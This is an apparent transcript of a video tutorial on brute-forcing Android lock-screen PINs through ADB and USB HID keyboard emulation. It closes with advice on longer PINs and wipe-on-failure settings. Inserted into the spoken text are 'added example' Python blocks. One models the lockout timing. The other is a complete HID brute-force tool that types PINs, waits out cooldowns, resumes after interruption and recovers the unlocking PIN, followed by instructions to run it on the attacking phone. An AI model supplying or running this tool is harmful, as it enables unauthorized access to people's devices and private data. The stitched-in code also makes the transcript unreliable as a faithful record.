Welcome to my video, where I will demonstrate how to unlock a PIN-protected, lock-screen-locked Android device. This video is about the possibilities, the options for how to unlock such a smartphone. We will focus only on Android, not iPhones, and we will mainly cover PIN-protected devices rather than pattern- or passcode-protected ones. This video is the result of my research into how to unlock such a smartphone using various techniques. I have been posting on my social media and I received dozens, if not hundreds, of requests to create tutorials on how this can be done on your locked smartphone. Also, there is no 100% guaranteed technique that would unlock your protected Android.

What is the purpose? Well, you forgot your PIN: you found your old smartphone and you would like to retrieve the data stored on it, but you don't recall the PIN code. Or someone in your family, someone close to you, your friend, is deceased, and you would still like to retrieve the photos, the videos, the memories; this is also one of the popular requests I have been receiving on my social media. And last but not least, forensic analysis: you need to unlock a smartphone to retrieve the data. This is for educational purposes only. Don't try to get inside a locked smartphone without the explicit permission of its owner.
Now let's continue with the possibilities for how to unlock such a protected smartphone. There are a few. The first one is using an exploit: an exploit that bypasses the lock screen protection or escalates privileges to root. Then there is trial and error, which can be automated into a brute force. And the last one, if you don't care about the data: you can factory reset from recovery. There are not many options, not many possibilities, so the only one we will focus on in this video is brute force.
Of course, using brute force has its limitations. Actually, there are two, to my knowledge. The first one is the timeout; there is no way to bypass the timeout without an exploit. What does it mean? After five wrong PIN attempts there is a 30-second cooldown; after another five wrong attempts, another 30 seconds; and then after each wrong PIN there is a 30-second cooldown, until you reach 41 attempts, after which there is a 60-second cooldown after each wrong PIN. These timeouts are for stock Android, at least to my knowledge; if you are using a custom UI, custom MIUI, there might be some differences.
If we put this in actual numbers, how long would it take to unlock different PIN protections? If you have a four-digit PIN, there are ten thousand possible combinations; going through all of them using the script I will shortly introduce would take 167 hours, which is approximately 7 days. And by increasing the number of digits, the time spent on cracking increases exponentially, so if you use an eight-digit PIN code it would take 190 years.
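As an added example (not the video's script or any tool it mentions), here is a small Python model of the lockout schedule just described. It reproduces the roughly 167-hour and 190-year worst-case figures for four- and eight-digit PINs; the 0.25 s assumed for typing one PIN plus Enter is my assumption, and the cooldown schedule is the stock-Android one the video describes.

```python
"""Lockout-schedule model (added example, not the video's script).
Cooldown schedule: stock Android as described in the video. The 0.25 s
needed to type one PIN plus Enter is an assumption."""

SECONDS_PER_YEAR = 365.25 * 24 * 3600


def cooldown_after(attempt: int) -> int:
    """Seconds the lock screen blocks input after wrong attempt number `attempt`."""
    if attempt <= 10:
        return 30 if attempt % 5 == 0 else 0      # 30 s after attempts 5 and 10
    return 30 if attempt < 41 else 60             # then after every attempt; 60 s from 41


def time_to_exhaust(attempts: int, entry_seconds: float = 0.25) -> float:
    """Worst-case seconds to type `attempts` PINs while honouring every cooldown."""
    head = min(attempts, 41)
    total = sum(entry_seconds + cooldown_after(n) for n in range(1, head + 1))
    if attempts > 41:
        # from attempt 41 on every attempt costs the same, so use the closed form
        total += (attempts - 41) * (entry_seconds + cooldown_after(41))
    return total


def estimate(pin_length: int, entry_seconds: float = 0.25) -> dict:
    """Worst case for an exhaustive search of all 10**pin_length PINs."""
    attempts = 10 ** pin_length
    seconds = time_to_exhaust(attempts, entry_seconds)
    return {"pin_length": pin_length, "attempts": attempts,
            "hours": seconds / 3600, "years": seconds / SECONDS_PER_YEAR}


if __name__ == "__main__":
    for length in (4, 6, 8):
        e = estimate(length)
        print(f"{length} digits: {e['attempts']:>10,} PINs -> "
              f"{e['hours']:,.0f} h ({e['years']:.1f} years)")
```

The closed form matters: beyond attempt 41 every guess costs the same 60 s plus typing time, so the model stays instant even for the 10^8 guesses of an eight-digit PIN. Change `entry_seconds` to match how fast your HID device actually types and the estimate updates accordingly.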
The second limitation is factory reset. This is not set by default; it needs to be set by the user from the settings, and it means that after 15 wrong attempts the device will erase all the data. So, again, there are two limitations: timeout and factory reset.
Let's focus on the brute force. Brute force can be performed using two options: the first one is using ADB, where USB debugging needs to be enabled, and the second one is using HID, a human interface device, a Rubber Ducky. Let's start with ADB. What are the requirements? The smartphone needs to have the USB debugging option enabled, and the smartphone whose PIN we want to crack or brute force needs to have authorized the connected computer or another Android. The problem is that if we receive a smartphone that is already locked, there is no way to enable USB debugging and authorize the smartphone; because of that, I believe this technique is not really useful. Still, I will show you one tool, vbrooter, that is available on GitHub. All the links will be posted in the video description.
Still, using ADB there is no way to bypass the timeouts, except for one Android version, which is Android 8.0. It introduced a new feature that made it possible to change the PIN, pattern or password of the lock screen using a new ADB command, and that feature contained a bug which resulted in bypassing the timeouts, but only for Android 8.0. I tested Android 8.1, 8.0 and 10, and this feature, or this bug, is not present anymore.

I prepared a quick demonstration. I have two smartphones. This is the main one that will perform the brute force; I'm using an OTG cable. This one is Android 8.0. I will unlock the smartphone using my PIN, 0026, and I will start vbrooter on my Android. It means that it goes through all the PIN combinations, starting from 0000 until it reaches 0026. There is no throttling of the PIN. You see the errors; this means there should be a timeout cooldown, but that was the problem here: it was not implemented correctly, and because of that we can unlock our smartphone by going through all the combinations in a short time period. Still, other versions of Android are not supported, and you still need to have USB debugging enabled. Because of that, I believe this is obsolete.
We will focus on HID, using either a Rubber Ducky or an Android. What does it mean? HID, human interface device, means that the smartphone or USB device connected to the targeted device, which is locked and PIN-protected, behaves as a keyboard, and this keyboard sends exact keys, and these keys are actually PIN codes. There is no need to enable USB debugging or anything else on the device: if you connect a keyboard to your tablet or smartphone, it will work. The requirements for this technique are either a rooted Android smartphone that has HID enabled or a Rubber Ducky USB. On how to enable HID on Android, I have already prepared two videos that are available on my YouTube channel. Then we need an OTG cable that connects our main and targeted smartphones.
For HID brute force we will use the Android PIN brute force tool that is available on GitHub. It's free and super handy. It has a lot of pros and cons. For example, you can test various PIN lengths, from 1 to 10 digits. It uses optimized PIN lists for four-, five- and six-digit PINs; these are based on the most popular top PINs according to statistics. It detects all the timeouts, and if you unplug your smartphone (since, if you're trying to crack the PIN, it will take a lot of hours and you need to recharge your device), if you unplug, charge the smartphone and plug it back in, it continues where it stopped. There is one problem: since it is an HID-connected keyboard in this case, it cannot receive any events from the smartphone, so it doesn't know whether the PIN was correct or not, so it would still continue guessing and entering the other PINs in the row, in the list. Because of that we need to manually grab the attempt from the logs and compare it with the PIN that is in the PIN list. I'll demonstrate it later on.
How to install the tool: git clone, change the mode for execution, and just trigger it. There are various options. When you try to crack a four-digit PIN, this is the command. After you git clone, it's necessary to edit the config file, which contains in one of its last lines the HID keyboard global value that holds the path to the HID binary for the keyboard; this needs to be replaced with yours. And here's a quick example: the main smartphone executes this script, where we try to guess a four-digit PIN, and after five attempts there is a timeout and the script waits until the timeout is done.
I also prepared a longer demonstration on this topic, where I perform the guessing of a more sophisticated PIN. Actually, it went through 44 PINs: the first five attempts, timeout, another five, timeout, and so on until we reached attempt 41, where it increased to 60 seconds, until right now, when we guess the correct PIN. As you can see, there is no log of the correct PIN; we only see that there was attempt number 45. Based on this attempt number we have to search for the PIN in the list of optimized PINs. We also see how long it took; in this case it was around 25 minutes.
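The following is an added example, written for this page and not the code of the GitHub tool, showing how a HID brute-force loop of the kind described above can be built: it encodes each PIN as standard 8-byte USB boot-keyboard reports, sleeps through the stock-Android cooldowns, logs the attempt number, checkpoints progress so a run interrupted for recharging resumes where it stopped, and maps an attempt number from the log back to the PIN that was typed (the manual step the demonstration ends with). It assumes the attacking phone exposes its HID keyboard gadget as a writable device node at /dev/hidg0 (an assumption; the real tool drives a separate HID binary configured in its config file) and that the lock screen accepts digits followed by Enter. The `send`, `sleep` and `log` callables are injectable so the loop can be exercised without hardware.

```python
"""HID keyboard PIN brute force: added example, not the GitHub tool's code.
Assumptions: the attacking phone exposes a USB HID keyboard gadget as a writable
node (/dev/hidg0 is assumed); the lock screen takes digits then Enter; the cooldown
schedule is the stock-Android one described in the video."""
import json
import os
import sys
import time
from typing import Callable, List, Optional

# USB HID usage IDs (keyboard/keypad page) for the top-row digits and Enter.
DIGIT_USAGE = {"1": 0x1E, "2": 0x1F, "3": 0x20, "4": 0x21, "5": 0x22,
               "6": 0x23, "7": 0x24, "8": 0x25, "9": 0x26, "0": 0x27}
ENTER_USAGE = 0x28
RELEASE = bytes(8)  # all-zero 8-byte boot-keyboard report: no key pressed


def hid_reports(pin: str) -> List[bytes]:
    """Press/release reports that type `pin` then Enter ([modifier, reserved, key1..key6])."""
    reports: List[bytes] = []
    for ch in pin:
        reports.append(bytes([0, 0, DIGIT_USAGE[ch], 0, 0, 0, 0, 0]))
        reports.append(RELEASE)
    reports.append(bytes([0, 0, ENTER_USAGE, 0, 0, 0, 0, 0]))
    reports.append(RELEASE)
    return reports


def stock_cooldown(attempt: int) -> int:
    """Seconds the lock screen blocks input after wrong attempt number `attempt`."""
    if attempt <= 10:
        return 30 if attempt % 5 == 0 else 0
    return 30 if attempt < 41 else 60


def all_pins(length: int) -> List[str]:
    """Exhaustive, ordered PIN list (the tool's optimised lists order by popularity instead)."""
    return [str(i).zfill(length) for i in range(10 ** length)]


def pin_for_attempt(pins: List[str], attempt: int) -> str:
    """Map the 1-based attempt number printed in the log back to the PIN that was typed."""
    return pins[attempt - 1]


class HidBruteForcer:
    """Types PINs in order, sleeps through cooldowns, logs each attempt number and
    checkpoints progress so a run interrupted for recharging resumes where it stopped.
    A HID keyboard receives nothing back, so the loop cannot tell which PIN worked."""

    def __init__(self, pins: List[str], send: Callable[[bytes], None],
                 state_path: Optional[str] = None,
                 cooldown: Callable[[int], int] = stock_cooldown,
                 sleep: Callable[[float], None] = time.sleep,
                 log: Callable[[str], None] = print) -> None:
        self.pins, self.send, self.state_path = pins, send, state_path
        self.cooldown, self.sleep, self.log = cooldown, sleep, log
        self.attempts_done = 0
        if state_path and os.path.exists(state_path):   # resume after an unplug
            with open(state_path) as fh:
                self.attempts_done = int(json.load(fh)["attempts_done"])

    def _checkpoint(self) -> None:
        if self.state_path:
            with open(self.state_path, "w") as fh:
                json.dump({"attempts_done": self.attempts_done}, fh)

    def run(self, max_attempts: Optional[int] = None) -> int:
        """Type up to `max_attempts` further PINs; returns the last attempt number."""
        stop = len(self.pins)
        if max_attempts is not None:
            stop = min(stop, self.attempts_done + max_attempts)
        while self.attempts_done < stop:
            pin = self.pins[self.attempts_done]
            for report in hid_reports(pin):
                self.send(report)
            self.attempts_done += 1
            self._checkpoint()
            self.log(f"attempt {self.attempts_done}: {pin}")
            wait = self.cooldown(self.attempts_done)
            if wait and self.attempts_done < stop:
                self.log(f"cooldown {wait}s")
                self.sleep(wait)
        return self.attempts_done


def hidg_sender(path: str = "/dev/hidg0") -> Callable[[bytes], None]:
    """Sender writing raw reports to the HID gadget node (assumed path)."""
    fh = open(path, "wb", buffering=0)

    def send(report: bytes) -> None:
        fh.write(report)
    return send


if __name__ == "__main__":
    length = int(sys.argv[1]) if len(sys.argv) > 1 else 4
    pins = all_pins(length)
    done = HidBruteForcer(pins, hidg_sender(), state_path="bruteforce.state").run()
    print(f"finished after attempt {done}; map the unlocking attempt with pin_for_attempt()")
```

Run it on the attacking phone as `python3 hid_pin.py 4`; when the target unlocks, note the last attempt number printed and call `pin_for_attempt(all_pins(4), N)` to recover the PIN, exactly the lookup the demonstration does by hand against its optimized list. Swap `all_pins()` for a popularity-ordered list to get the tool's optimized behaviour.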
How to prevent this scenario? If you believe you might be a target, use longer PINs, six to eight digits, and as you saw it will take years to crack them. Also, don't use easy-to-guess PIN codes, or you can switch to passwords. One more option: set factory reset after 15 wrong attempts. I don't use this technique, because if you have a kid in your home it might not end up really well for you. We're heading to the conclusion.
When you have a locked smartphone, there are not many possibilities for how to unlock it: you need to either have an exploit or you have to brute force the PIN; there is no other option. This technique was only against PINs, not passwords, since a password might be more complex and you would need a wordlist. Cracking a pattern is not that simple, because our script would need to be customized for various displays and would need to perform clicks and swipes at particular parts of the screen. Also, if you use a password, it's much more secure. Using brute force is a long-lasting operation, but there is no other option for how to unlock such a protected smartphone; because of that, you need to be really patient. Thank you very much for your time. I hope you never need to use this technique. Bye, guys.